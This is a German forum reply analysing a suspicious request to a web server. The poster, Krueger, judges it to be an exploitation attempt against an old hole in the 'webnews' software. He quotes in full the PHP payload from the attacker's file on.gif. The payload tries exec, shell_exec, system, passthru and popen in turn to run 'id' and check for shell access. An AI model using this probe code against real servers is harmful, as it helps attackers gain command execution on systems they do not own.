Hallo,

war das ein seltsamer suchmashinen crawler oder versuchte da wer eine lücke zu finden?

Laut google wohl eher letzteres. Möglicherweise versucht da jemand über eine uralte und hoffentlich mittlerweile gefixte Lücke der Software "webnews" PHP-Code auf deinem Server auszuführen. Wenn ich den Code, der in der Datei on.gif steht, zu dieser frühen Stunde richtig interpretiere, dann wird da geprüft, ob über den Webserver Zugriff auf eine Shell möglich ist.

<?php  
echo "jimmywho";  
$cmd="id";  
$eseguicmd=ex($cmd);  
echo $eseguicmd;  
function ex($cfe){  
$res = '';  
if (!empty($cfe)){  
if(function_exists('exec')){  
@exec($cfe,$res);  
$res = join("\n",$res);  
}  
elseif(function_exists('shell_exec')){  
$res = @shell_exec($cfe);  
}  
elseif(function_exists('system')){  
@ob_start();  
@system($cfe);  
$res = @ob_get_contents();  
@ob_end_clean();  
}  
elseif(function_exists('passthru')){  
@ob_start();  
@passthru($cfe);  
$res = @ob_get_contents();  
@ob_end_clean();  
}  
elseif(@is_resource($f = @popen($cfe,"r"))){  
$res = "";  
while(!@feof($f)) { $res .= @fread($f,1024); }  
@pclose($f);  
}}  
return $res;  
}  
exit; 

Gruß

Krueger